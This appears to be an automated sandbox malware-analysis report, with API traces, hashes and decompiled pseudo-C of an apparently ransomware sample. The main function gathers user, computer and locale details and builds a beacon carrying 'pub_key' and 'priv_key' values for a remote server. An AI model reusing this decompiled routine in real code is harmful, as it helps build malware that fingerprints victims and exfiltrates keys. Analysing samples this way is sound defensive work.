lstrlenA.KERNEL32(0F4E5445,0F4E5445,00000000,00000000,00000000,?,?,0F4E5444,00000000,?,?,?,?,0F4E5615,00000000,popkadurak), ref: 0F4E3484
GetProcessHeap.KERNEL32(00000008,00000001,?,0F4E5444,00000000,?,?,?,?,0F4E5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E348E
HeapAlloc.KERNEL32(00000000,?,0F4E5444,00000000,?,?,?,?,0F4E5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E3495
lstrcpyA.KERNEL32(00000000,0F4E5445,?,0F4E5444,00000000,?,?,?,?,0F4E5615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F4E34A7
ExitProcess.KERNEL32 ref: 0F4E34DB

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrlen$HeapProcess$AllocExitlstrcpy
String ID:
API String ID: 1867342102-0
Opcode ID: 4e982801e5883d23225daef66159765f5a5746f0a74f30eec77b3552641fcc38
Instruction ID: ae3dcdd5b4b902ad88b76e4a1b4f44b7152b4bec5b5e0d3203e6ae26675cef24
Opcode Fuzzy Hash: 4e982801e5883d23225daef66159765f5a5746f0a74f30eec77b3552641fcc38
Instruction Fuzzy Hash: 6431C0315042455ADB235F2898447F7BFA99B02312F98419BECC5CB383D66D68CA87A0

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E3CF0 Relevance: 7.6, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0F4E3D42
VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0F4E3D66
VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0F4E3D6A
VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0F4E3D6E
VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0F4E3D95

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: ConditionMask$InfoVerifyVersion_memset
String ID:
API String ID: 3299124433-0
Opcode ID: cebd4a0d5c2b6b3a2254a3e857f00ddeac0b4f0c340c5842aaf6d18215e75897
Instruction ID: 3bb5e03bb3087bc52d1da60ed2420e746e0f1821cc8f0a7eb9e462d2d3cba150
Opcode Fuzzy Hash: cebd4a0d5c2b6b3a2254a3e857f00ddeac0b4f0c340c5842aaf6d18215e75897
Instruction Fuzzy Hash: B3111BB0D4031C6EEB60DF65DC0ABEA7ABCEF08700F008199A648E61C1D6B84B948FD5

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E4EA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 116
stringCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0F4E4EA0(intOrPtr* __ecx, CHAR* __edx, intOrPtr* _a4) {
				CHAR* _v8;
				char _v12;
				char _v20;
				char _t16;
				char _t20;
				char _t21;
				intOrPtr* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t29;
				CHAR* _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				void* _t41;
				intOrPtr* _t42;
				void* _t47;
				void* _t49;
				intOrPtr* _t51;
				CHAR* _t53;

				asm("movq xmm0, [0xf4efaac]");
				_t16 =  *0xf4efab4; // 0x0
				_t29 = _a4;
				_v8 = __edx;
				_t51 = __ecx;
				asm("movq [ebp-0x10], xmm0");
				_v12 = _t16;
				if( *_t29 == 0) {
					L11:
					if(_t51 == 0) {
						goto L10;
					} else {
						if(_v20 == 0) {
							L22:
							if(_t51 == 0) {
								goto L10;
							} else {
								_t53 = _t51 + lstrlenA( &_v20);
								while(1) {
									_t20 =  *_t53;
									if(_t20 >= 0x30 && _t20 <= 0x39) {
										break;
									}
									_t53 =  &(_t53[1]);
								}
								_t33 = _t53;
								while(1) {
									_t21 =  *_t33;
									if(_t21 < 0x30 || _t21 > 0x39) {
										goto L30;
									}
									L31:
									_t33 =  &(_t33[1]);
									continue;
									L30:
									if(_t21 == 0x2e) {
										goto L31;
									}
									 *_t33 = 0;
									return lstrcpyA(_v8, _t53);
									goto L33;
								}
							}
						} else {
							_t34 =  *_t51;
							if(_t34 != 0) {
								_t47 = _t51 -  &_v20;
								do {
									_t24 =  &_v20;
									if(_t34 == 0) {
										L19:
										if( *_t24 == 0) {
											goto L22;
										} else {
											goto L20;
										}
									} else {
										while(1) {
											_t35 =  *_t24;
											if(_t35 == 0) {
												goto L22;
											}
											_t41 =  *((char*)(_t47 + _t24)) - _t35;
											if(_t41 != 0) {
												goto L19;
											} else {
												_t24 = _t24 + 1;
												if( *((intOrPtr*)(_t47 + _t24)) != _t41) {
													continue;
												} else {
													goto L19;
												}
											}
											goto L33;
										}
										goto L22;
									}
									goto L33;
									L20:
									_t34 =  *((intOrPtr*)(_t51 + 1));
									_t51 = _t51 + 1;
									_t47 = _t47 + 1;
								} while (_t34 != 0);
							}
							goto L10;
						}
					}
				} else {
					_t25 =  *__ecx;
					if(_t25 == 0) {
						L10:
						return lstrcpyA(_v8, "fabian wosar <3");
					} else {
						_t49 = __ecx - _t29;
						do {
							_t42 = _t29;
							if(_t25 == 0) {
								L8:
								if( *_t42 == 0) {
									goto L11;
								} else {
									goto L9;
								}
							} else {
								while(1) {
									_t26 =  *_t42;
									if(_t26 == 0) {
										goto L11;
									}
									_t38 =  *((char*)(_t49 + _t42)) - _t26;
									if(_t38 != 0) {
										goto L8;
									} else {
										_t42 = _t42 + 1;
										if( *((intOrPtr*)(_t49 + _t42)) != _t38) {
											continue;
										} else {
											goto L8;
										}
									}
									goto L33;
								}
								goto L11;
							}
							goto L33;
							L9:
							_t25 =  *((intOrPtr*)(_t51 + 1));
							_t51 = _t51 + 1;
							_t49 = _t49 + 1;
						} while (_t25 != 0);
						goto L10;
					}
				}
				L33:
			}

0x0f4e4ea6
0x0f4e4eae
0x0f4e4eb4
0x0f4e4eb9
0x0f4e4ebc
0x0f4e4ec1
0x0f4e4ec6
0x0f4e4ec9
0x0f4e4f1a
0x0f4e4f1c
0x00000000
0x0f4e4f1e
0x0f4e4f22
0x0f4e4f5f
0x0f4e4f61
0x00000000
0x0f4e4f63
0x0f4e4f6d
0x0f4e4f70
0x0f4e4f70
0x0f4e4f74
0x00000000
0x00000000
0x0f4e4f7a
0x0f4e4f7a
0x0f4e4f7d
0x0f4e4f80
0x0f4e4f80
0x0f4e4f84
0x00000000
0x00000000
0x0f4e4f8e
0x0f4e4f8e
0x00000000
0x0f4e4f8a
0x0f4e4f8c
0x00000000
0x00000000
0x0f4e4f95
0x0f4e4fa4
0x00000000
0x0f4e4fa4
0x0f4e4f80
0x0f4e4f24
0x0f4e4f24
0x0f4e4f28
0x0f4e4f2f
0x0f4e4f31
0x0f4e4f31
0x0f4e4f36
0x0f4e4f4f
0x0f4e4f52
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e4f38
0x0f4e4f38
0x0f4e4f38
0x0f4e4f3c
0x00000000
0x00000000
0x0f4e4f45
0x0f4e4f47
0x00000000
0x0f4e4f49
0x0f4e4f49
0x0f4e4f4d
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e4f4d
0x00000000
0x0f4e4f47
0x00000000
0x0f4e4f38
0x00000000
0x0f4e4f54
0x0f4e4f54
0x0f4e4f57
0x0f4e4f58
0x0f4e4f59
0x0f4e4f5d
0x00000000
0x0f4e4f28
0x0f4e4f22
0x0f4e4ecb
0x0f4e4ecb
0x0f4e4ecf
0x0f4e4f05
0x0f4e4f19
0x0f4e4ed1
0x0f4e4ed3
0x0f4e4ed5
0x0f4e4ed5
0x0f4e4ed9
0x0f4e4ef7
0x0f4e4efa
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e4edb
0x0f4e4ee0
0x0f4e4ee0
0x0f4e4ee4
0x00000000
0x00000000
0x0f4e4eed
0x0f4e4eef
0x00000000
0x0f4e4ef1
0x0f4e4ef1
0x0f4e4ef5
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e4ef5
0x00000000
0x0f4e4eef
0x00000000
0x0f4e4ee0
0x00000000
0x0f4e4efc
0x0f4e4efc
0x0f4e4eff
0x0f4e4f00
0x0f4e4f01
0x00000000
0x0f4e4ed5
0x0f4e4ecf
0x00000000

APIs

lstrcpyA.KERNEL32(?,fabian wosar <3,?,0F4E51ED), ref: 0F4E4F0D
lstrlenA.KERNEL32(00000000,?,0F4E51ED), ref: 0F4E4F67
lstrcpyA.KERNEL32(?,?,?,0F4E51ED), ref: 0F4E4F98

Strings

fabian wosar <3, xrefs: 0F4E4F05

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID: fabian wosar <3
API String ID: 367037083-1724090804
Opcode ID: 17cd55a8a90e90da989205b8c7b52558eedd1cf7f1a279f7383eead088300a52
Instruction ID: 6efdfa6d3a2157c2015819e014a95e9c02c93c8144c614b30e9b54ee38ac497c
Opcode Fuzzy Hash: 17cd55a8a90e90da989205b8c7b52558eedd1cf7f1a279f7383eead088300a52
Instruction Fuzzy Hash: A33122299081A54ACB22CE7854143FBBFA2AF43A13F9852DBDCD58B327E2616406C390

Uniqueness

Uniqueness Score: -1.00%

Function 0F4E3190 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 42
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F4E3190(CHAR* _a4) {
				char _t6;
				CHAR* _t13;
				CHAR* _t16;

				_t13 = _a4;
				_t16 = _t13;
				if( *_t13 == 0) {
					L5:
					lstrcmpiA(_t13, "mask");
					_t10 =  ==  ? 1 : 0;
					lstrcmpiA(_a4, "pub_key");
					 *_t16 = 0x3d;
					_t11 =  ==  ? 2 :  ==  ? 1 : 0;
					_t5 =  ==  ? 2 :  ==  ? 1 : 0;
					return  ==  ? 2 :  ==  ? 1 : 0;
				} else {
					while(1) {
						_t6 =  *_t16;
						if(_t6 == 0x7d) {
							break;
						}
						if(_t6 == 0x3d) {
							 *_t16 = 0;
							goto L5;
						} else {
							_t16 =  &(_t16[1]);
							if( *_t16 != 0) {
								continue;
							} else {
								goto L5;
							}
						}
						goto L8;
					}
					return 0;
				}
				L8:
			}

0x0f4e3193
0x0f4e3197
0x0f4e319c
0x0f4e31b0
0x0f4e31b9
0x0f4e31ce
0x0f4e31d1
0x0f4e31d9
0x0f4e31e1
0x0f4e31e4
0x0f4e31e9
0x0f4e31a0
0x0f4e31a0
0x0f4e31a0
0x0f4e31a4
0x00000000
0x00000000
0x0f4e31a8
0x0f4e31ec
0x00000000
0x0f4e31aa
0x0f4e31aa
0x0f4e31ae
0x00000000
0x00000000
0x00000000
0x00000000
0x0f4e31ae
0x00000000
0x0f4e31a8
0x0f4e31f5
0x0f4e31f5
0x00000000

APIs

lstrcmpiA.KERNEL32(0F4E5444,mask,0F4E5445,?,?,0F4E3441,0F4E5445,00000000,00000000,00000000,?,?,0F4E5444,00000000), ref: 0F4E31B9
lstrcmpiA.KERNEL32(0F4E5444,pub_key,?,0F4E3441,0F4E5445,00000000,00000000,00000000,?,?,0F4E5444,00000000), ref: 0F4E31D1

Strings

mask, xrefs: 0F4E31B1
pub_key, xrefs: 0F4E31BF

Memory Dump Source

Source File: 00000000.00000002.335664192.000000000F4E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F4E0000, based on PE: true

Associated: 00000000.00000002.335620830.000000000F4E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.335683978.000000000F4F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f4e0000_wThN5MTIsw.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: mask$pub_key
API String ID: 1586166983-1355590148
Opcode ID: c5e51b04c073498832933797959990e4465370d399c2120e6e3bb7ec70218b4b
Instruction ID: 180608e0b945bfff5ba921c7f911af2cc244a0d1ee10d34d8929eb68f57c0e82
Opcode Fuzzy Hash: c5e51b04c073498832933797959990e4465370d399c2120e6e3bb7ec70218b4b
Instruction Fuzzy Hash: F3F0F6723082845EE7264E689C457F2FFC99B45322F9805FFEEC9C7242D6AA98818354

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ssapst.exePID: 6592, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	20.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	716
Total number of Limit Nodes:	12

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0FE65860 Relevance: 109.0, APIs: 55, Strings: 7, Instructions: 458
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E0FE65860(CHAR* __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v148;
				char _v152;
				void* _v156;
				int _v160;
				int _v164;
				CHAR* _v172;
				int _v176;
				CHAR* _v184;
				int _v192;
				void* _v196;
				CHAR* _v200;
				CHAR* _v204;
				WCHAR* _v208;
				void* _v212;
				void* _v216;
				signed int _v220;
				short* _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				CHAR* _v240;
				CHAR* _v268;
				void* __esi;
				CHAR* _t134;
				void* _t136;
				int _t146;
				void* _t149;
				int _t150;
				signed int _t151;
				void* _t153;
				int _t159;
				signed int _t167;
				signed int _t171;
				CHAR* _t178;
				int _t179;
				CHAR* _t182;
				void* _t191;
				long _t195;
				void _t210;
				int _t211;
				intOrPtr _t215;
				int _t216;
				char _t217;
				long _t226;
				int _t239;
				char* _t240;
				void* _t244;
				void* _t245;
				void* _t248;
				long _t250;
				signed int _t254;
				CHAR* _t256;
				int _t259;
				int _t260;
				void* _t261;
				void* _t266;
				CHAR* _t267;
				void* _t270;
				CHAR* _t273;
				long _t276;
				CHAR* _t277;
				char* _t279;
				signed int _t282;
				int _t283;
				long _t286;
				void* _t287;
				void* _t288;
				WCHAR* _t289;
				WCHAR* _t290;
				void* _t291;
				WCHAR* _t292;
				WCHAR* _t294;
				int _t297;
				long _t298;
				void* _t299;
				CHAR* _t300;
				int _t302;
				signed int _t303;
				void* _t307;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v184 = __ecx;
				_v160 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_t307 = (_t303 & 0xfffffff8) - 0x9c;
				_push(1);
				_push(__ecx);
				_push(1);
				E0FE63BC0( &_v148);
				E0FE67490( &_v236, __edx); // executed
				_t266 = E0FE672A0( &_v236);
				_t282 = _a8 + __edx;
				_t7 = _t282 + 8; // 0x8
				_t226 = _t266 + _t7 * 8 << 3;
				_t134 = VirtualAlloc(0, _t226, 0x3000, 0x40); // executed
				_t259 = 0;
				_v240 = _t134;
				_v268 = _t134;
				_t239 = 0x30 + (_t266 + _t282 * 4) * 8;
				if(_t134 == 0 || _t239 >= _t226) {
					_v176 = _t259;
					_t267 = _t134;
				} else {
					_t267 = _t239 + _t134;
					_v176 = _t134;
					_v184 = _t267;
					_t259 = _t239;
				}
				_t136 = 2 + _a8 * 8;
				if(_v156 == 0) {
					L7:
					_t240 = 0;
					_v172 = 0;
				} else {
					_t302 = _t259 + _t136;
					if(_t302 >= _t226) {
						goto L7;
					} else {
						_t240 = _t267;
						_v172 = _t267;
						_t267 =  &(_t267[_t136]);
						_t259 = _t302;
						_v184 = _t267;
					}
				}
				_t283 = _v164;
				if(_v156 == 0 || 2 + _t283 * 8 + _t259 >= _t226) {
					_t267 = 0;
					_v184 = 0;
				}
				if(_t240 == 0) {
					L58:
					VirtualFree(_v156, 0, 0x8000);
					E0FE67D70( &_v152);
					return 1;
				} else {
					_t260 = _a8;
					_v160 = _t260 + _t260;
					CryptBinaryToStringA(_a4, _t260, 0x40000001, _t240,  &_v160);
					_v176 = _t283 + _t283;
					CryptBinaryToStringA(_v204, _t283, 0x40000001, _t267,  &_v176);
					_t146 = lstrlenA(_t267);
					_t286 = _t146 + lstrlenA(_v204) + 0x42;
					_t149 = VirtualAlloc(0, _t286, 0x3000, 0x40); // executed
					_v196 = _t149;
					_v200 = _t149;
					_v220 = 0;
					_t150 = lstrlenA(_v204);
					_t261 = _v196;
					_t151 = _t150 + 1;
					if(_t261 == 0 || _t151 >= _t286) {
						_v212 = 0;
					} else {
						_v220 = _t151;
						_v200 = _t261 + _t151;
						_v212 = _t261;
					}
					_t153 = lstrlenA(_t267) + 1;
					if(_v196 == 0 || _t153 + _v220 >= _t286) {
						_v200 = 0;
					}
					_t287 = 0;
					if(lstrlenA(_v204) != 0) {
						_t279 = _v212;
						do {
							_t256 = _v204;
							_t217 =  *((intOrPtr*)(_t287 + _t256));
							if(_t217 != 0xa && _t217 != 0xd) {
								 *_t279 = _t217;
								_t279 = _t279 + 1;
							}
							_t287 = _t287 + 1;
						} while (_t287 < lstrlenA(_t256));
						_t267 = _v216;
					}
					_t288 = 0;
					if(lstrlenA(_t267) != 0) {
						_t254 = _v200;
						_v220 = _t254;
						do {
							_t215 =  *((intOrPtr*)(_t288 + _t267));
							if(_t215 != 0xa && _t215 != 0xd) {
								 *_t254 = _t215;
								_v220 = _t254 + 1;
							}
							_t288 = _t288 + 1;
							_t216 = lstrlenA(_t267);
							_t254 = _v220;
						} while (_t288 < _t216);
					}
					_t289 = _v208;
					lstrcatW(_t289, L"action=call&");
					_t290 =  &(_t289[lstrlenW(_t289)]);
					_v216 = _t290;
					E0FE670A0( &_v184, _t290); // executed
					_v224 = 0;
					_v208 = 0;
					_t159 = E0FE635C0( &_v224,  &_v208); // executed
					if(_t159 == 0) {
						ExitProcess(_t159); // executed
					}
					lstrcatW(_t290, L"&id=");
					_t270 = _v220;
					lstrcatW(_t290, _t270);
					lstrcatW(_t290, L"&subid=");
					_t291 = _v204;
					lstrcatW(_v216, _t291);
					VirtualFree(_t270, 0, 0x8000);
					VirtualFree(_t291, 0, 0x8000);
					_t292 = _v216;
					lstrcatW(_t292, L"&pub_key=");
					_t167 = lstrlenW(_t292);
					MultiByteToWideChar(0xfde9, 0, _v212, 0xffffffff,  &(_t292[_t167]), lstrlenA(_v212));
					_t294 = _v216;
					lstrcatW(_t294, L"&priv_key=");
					_t171 = lstrlenW(_t294);
					_t273 = _v200;
					MultiByteToWideChar(0xfde9, 0, _t273, 0xffffffff,  &(_t294[_t171]), lstrlenA(_t273));
					lstrcatW(_v216, L"&version=2.3.1r");
					_t276 = (lstrlenW(_v208) << 4) + 0x12;
					_v216 = VirtualAlloc(0, _t276, 0x3000, 0x40);
					_t244 = 2 + lstrlenW(_v208) * 8;
					_t178 = _v216;
					if(_t178 == 0 || _t244 >= _t276) {
						_t277 = 0;
					} else {
						_t277 = _t178;
					}
					_t179 = lstrlenW(_v208);
					_t245 =  *0xfe72a78; // 0x0
					_v220 = _t179;
					if(_t245 != 0) {
						VirtualFree(_t245, 0, 0x8000);
					}
					_t182 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
					 *0xfe72a78 = _t182;
					if(_t182 != 0) {
						wsprintfA(_t182, "%S", L"popkadurak");
						_t307 = _t307 + 0xc;
					}
					_t297 = _v220 + _v220;
					E0FE65F00(_v208, _t297, _t297);
					_v192 = _v220 * 8;
					if(CryptBinaryToStringA(_v208, _t297, 0x40000001, _t277,  &_v192) == 0) {
						GetLastError();
					}
					_t104 = lstrlenA(_t277) + 2; // 0x2
					_t298 = _t104;
					_v228 = VirtualAlloc(0, _t298, 0x3000, 0x40);
					_t106 = lstrlenA(_t277) + 1; // 0x1
					_t248 = _t106;
					_t191 = _v228;
					if(_t191 == 0) {
						L46:
						_v216 = 0;
					} else {
						_v216 = _t191;
						if(_t248 >= _t298) {
							goto L46;
						}
					}
					_t299 = 0;
					if(lstrlenA(_t277) != 0) {
						_v236 = _v216;
						do {
							_t210 =  *((intOrPtr*)(_t299 + _t277));
							if(_t210 != 0xa && _t210 != 0xd) {
								 *_t248 = _t210;
								_v236 = _t248 + 1;
							}
							_t299 = _t299 + 1;
							_t211 = lstrlenA(_t277);
							_t248 = _v236;
						} while (_t299 < _t211);
					}
					_t300 = _v216;
					MultiByteToWideChar(0xfde9, 0, _t300, 0xffffffff, _v224, lstrlenA(_t300));
					_v236 = 0;
					_t195 = E0FE654F0(_t300,  &_v236, _t248, 1);
					if(_t195 != 0) {
						_t250 = _v236;
						if(_t250 != 0) {
							 *_a12 = _t250;
						}
						VirtualFree(_v228, 0, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						goto L58;
					} else {
						VirtualFree(_v228, _t195, 0x8000);
						VirtualFree(_v232, 0, 0x8000);
						VirtualFree(_v212, 0, 0x8000);
						VirtualFree(_v204, 0, 0x8000);
						E0FE67D70( &_v200);
						return 0;
					}
				}
			}

0x0fe6586f
0x0fe65870
0x0fe65872
0x0fe65873
0x0fe65878
0x0fe6587e
0x0fe65882
0x0fe65884
0x0fe65885
0x0fe65887
0x0fe65888
0x0fe6588a
0x0fe6588b
0x0fe6588d
0x0fe6588e
0x0fe65890
0x0fe65893
0x0fe65895
0x0fe65896
0x0fe6589f
0x0fe658a8
0x0fe658b9
0x0fe658bb
0x0fe658c4
0x0fe658ca
0x0fe658d0
0x0fe658d6
0x0fe658d8
0x0fe658dc
0x0fe658e3
0x0fe658ec
0x0fe65901
0x0fe65905
0x0fe658f2
0x0fe658f2
0x0fe658f5
0x0fe658f9
0x0fe658fd
0x0fe658fd
0x0fe6590f
0x0fe65916
0x0fe6592f
0x0fe6592f
0x0fe65931
0x0fe65918
0x0fe65918
0x0fe6591d
0x00000000
0x0fe6591f
0x0fe6591f
0x0fe65921
0x0fe65925
0x0fe65927
0x0fe65929
0x0fe65929
0x0fe6591d
0x0fe6593a
0x0fe6593e
0x0fe6594d
0x0fe6594f
0x0fe6594f
0x0fe6595b
0x0fe65d98
0x0fe65da3
0x0fe65da9
0x0fe65db9
0x0fe65961
0x0fe65961
0x0fe6596d
0x0fe65980
0x0fe65985
0x0fe65999
0x0fe659a2
0x0fe659b6
0x0fe659bb
0x0fe659c5
0x0fe659c9
0x0fe659cd
0x0fe659d5
0x0fe659d7
0x0fe659db
0x0fe659de
0x0fe659f5
0x0fe659e4
0x0fe659e7
0x0fe659eb
0x0fe659ef
0x0fe659ef
0x0fe65a00
0x0fe65a06
0x0fe65a10
0x0fe65a10
0x0fe65a1c
0x0fe65a22
0x0fe65a24
0x0fe65a30
0x0fe65a30
0x0fe65a34
0x0fe65a39
0x0fe65a3f
0x0fe65a41
0x0fe65a41
0x0fe65a43
0x0fe65a46
0x0fe65a4a
0x0fe65a4a
0x0fe65a4f
0x0fe65a55
0x0fe65a57
0x0fe65a5b
0x0fe65a60
0x0fe65a60
0x0fe65a65
0x0fe65a6b
0x0fe65a6e
0x0fe65a6e
0x0fe65a73
0x0fe65a74
0x0fe65a76
0x0fe65a7a
0x0fe65a60
0x0fe65a7e
0x0fe65a8e
0x0fe65a9b
0x0fe65a9f
0x0fe65aa3
0x0fe65aac
0x0fe65ab8
0x0fe65ac0
0x0fe65ac7
0x0fe65aca
0x0fe65aca
0x0fe65ad6
0x0fe65ad8
0x0fe65ade
0x0fe65aea
0x0fe65af0
0x0fe65af9
0x0fe65b0d
0x0fe65b17
0x0fe65b19
0x0fe65b23
0x0fe65b30
0x0fe65b4a
0x0fe65b50
0x0fe65b5a
0x0fe65b61
0x0fe65b63
0x0fe65b79
0x0fe65b88
0x0fe65ba6
0x0fe65bb6
0x0fe65bbc
0x0fe65bc3
0x0fe65bc9
0x0fe65bd3
0x0fe65bcf
0x0fe65bcf
0x0fe65bcf
0x0fe65bd9
0x0fe65bdb
0x0fe65be1
0x0fe65be7
0x0fe65bf1
0x0fe65bf1
0x0fe65c0b
0x0fe65c11
0x0fe65c18
0x0fe65c25
0x0fe65c2b
0x0fe65c2b
0x0fe65c36
0x0fe65c3b
0x0fe65c4b
0x0fe65c67
0x0fe65c69
0x0fe65c69
0x0fe65c79
0x0fe65c79
0x0fe65c86
0x0fe65c8c
0x0fe65c8c
0x0fe65c8f
0x0fe65c95
0x0fe65c9f
0x0fe65c9f
0x0fe65c97
0x0fe65c97
0x0fe65c9d
0x00000000
0x00000000
0x0fe65c9d
0x0fe65ca8
0x0fe65cae
0x0fe65cb4
0x0fe65cb8
0x0fe65cb8
0x0fe65cbd
0x0fe65cc3
0x0fe65cc6
0x0fe65cc6
0x0fe65ccb
0x0fe65ccc
0x0fe65cce
0x0fe65cd2
0x0fe65cb8
0x0fe65cd6
0x0fe65cec
0x0fe65cf9
0x0fe65d03
0x0fe65d0d
0x0fe65d5c
0x0fe65d62
0x0fe65d67
0x0fe65d67
0x0fe65d7b
0x0fe65d89
0x0fe65d96
0x00000000
0x0fe65d0f
0x0fe65d20
0x0fe65d2e
0x0fe65d3b
0x0fe65d48
0x0fe65d4e
0x0fe65d5b
0x0fe65d5b
0x0fe65d0d

APIs

Part of subcall function 0FE63BC0: GetProcessHeap.KERNEL32(?,?,0FE64807,00000000,?,00000000,00000000), ref: 0FE63C5C

Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FE674B7
Part of subcall function 0FE67490: GetUserNameW.ADVAPI32(00000000,?), ref: 0FE674C8
Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FE674E6
Part of subcall function 0FE67490: GetComputerNameW.KERNEL32 ref: 0FE674F0
Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FE67510
Part of subcall function 0FE67490: wsprintfW.USER32 ref: 0FE67551
Part of subcall function 0FE67490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FE6756E
Part of subcall function 0FE67490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FE67592
Part of subcall function 0FE67490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FE64810,?), ref: 0FE675B6
Part of subcall function 0FE67490: RegCloseKey.KERNEL32(00000000), ref: 0FE675D2

Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672F2
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE672FD
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67313
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6731E
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67334
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE6733F
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67355
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(0FE64B36,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67360
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67376
Part of subcall function 0FE672A0: lstrlenW.KERNEL32(?,?,?,?,0FE64819,00000000,?,00000000,00000000,?,00000000), ref: 0FE67381
